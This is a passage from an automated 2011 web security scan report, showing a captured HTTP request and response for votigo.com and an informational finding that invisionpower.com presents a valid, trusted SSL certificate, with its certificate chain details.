Host: www.votigo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NJMZMZS192.168.1.181CKMLM; __utmz=259995789.1305478397.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=259995789.1874215674.1305478397.1305478397.1305478397.1; __utmc=259995789; __utmb=259995789.1.10.1305478397

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:24 GMT
Server: Apache
Last-Modified: Wed, 16 Dec 2009 05:30:37 GMT
ETag: "1508c2e-8be-47ad1ce6f5940"
Accept-Ranges: bytes
Content-Length: 2238
Content-Type: text/plain; charset=UTF-8

...... ..............(... ...@...................................Y.......................0...........w...............,...*...$...n.......^...(.......................2...........h.....................
...[SNIP]...

25. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.invisionpower.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.invisionpower.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sun Oct 18 03:56:22 CDT 2009
Valid to:	Sat Nov 19 19:12:50 CST 2011

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Sun May 15 12:13:32 CDT 2011.